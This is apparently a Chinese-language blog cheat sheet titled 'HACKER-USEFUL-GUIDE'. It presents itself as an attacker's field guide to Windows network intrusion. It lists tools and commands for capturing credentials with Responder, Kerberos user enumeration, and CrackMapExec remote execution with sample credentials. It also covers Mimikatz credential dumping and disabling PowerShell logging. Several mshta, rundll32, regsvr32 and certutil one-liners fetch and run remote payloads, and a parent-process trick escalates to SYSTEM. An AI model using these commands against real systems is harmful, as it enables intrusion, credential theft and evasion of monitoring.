HACKER-USEFUL-GUIDE

HACKER-USEFUL-GUIDE

十二月 25, 2021

网络发现

  1. Burp Suite
  2. OWASP ZAP(开源)
  3. Dirbuster
  4. GoBuster:轻量级、快速的目录和子域名爆破工具

跨站脚本(XSS)

  1. BeFF(浏览器漏洞利用框架):将JavaScript静荷注入到浏览器中,创建一个命令和控制通道,以便javascript后期利用
  2. 分两部分:服务器,攻击静荷
  3. 盲XSS:执行存储的XSS静荷时看不到回显效果(例如:“联系我们”
    1. XSS Hunter工具验证盲XSS

在没有凭证的网络上

  1. Responder工具
    1. http伪装windows验证:sudo responder -I eth0 -wfFbw
  2. MultiRelay.py

枚举没有凭证的用户

  1. nmap:nmap -p88 --script krb5-enum-users --script-args krb5-enum-users.realm="cyberspacekittens.local",userdb=/opt/userlist.txt 10.100.100.200
  2. CrackMapExec(CME)扫描:cme smb 10.100.100.0/24 -d 'cyberspacekittens.local' -u 'neil.pawstrong' -p '.wertSDFG' -M empire_exec -o LISTENER=http

从内存中提取明文文本凭证

  1. (针对win10)Mimikatz
  2. (针对浏览器)Mimikittenz

脚本自动化配置

  1. RC脚本自动化Metasploit
  2. Empire自动化
  3. Conbalt Strike自动化

禁用日志记录

  1. 禁用powershell日志记录

windows下cmd从internet下载文件实例

  1. 利用windows“功能”:
    • mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
    • mshta http://webserver/payload.hta
    • rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");windows.close();
    • regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
    • certutil -urlcache -split -f http://server/payload payload
    • certutil -urlcache -split -f http://server/payload.b64 payload.b64 &certutil -decode payload.b64 payload.dll & C:\\Windows\Microsoft.NET\Framework64\ v4.0.30319\InstallUtil/logfile=/LogToConsole=false /u payload.dll
    • certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 &certutil -decode payload.b64 payload.exe & payload.exe

win从本地管理员获取系统权限

  1. decoder-it创建一个PowerShell脚本,将本地管理Powershell提示符转换为System权限,通过创建一个新进程,设置新进程父类进程为系统进程。
    • C:>..\psgetsys.psl
    • C:>[MyProcess]::CreateProcessFromParent(<process_run_by_system>,<command_to_execute>)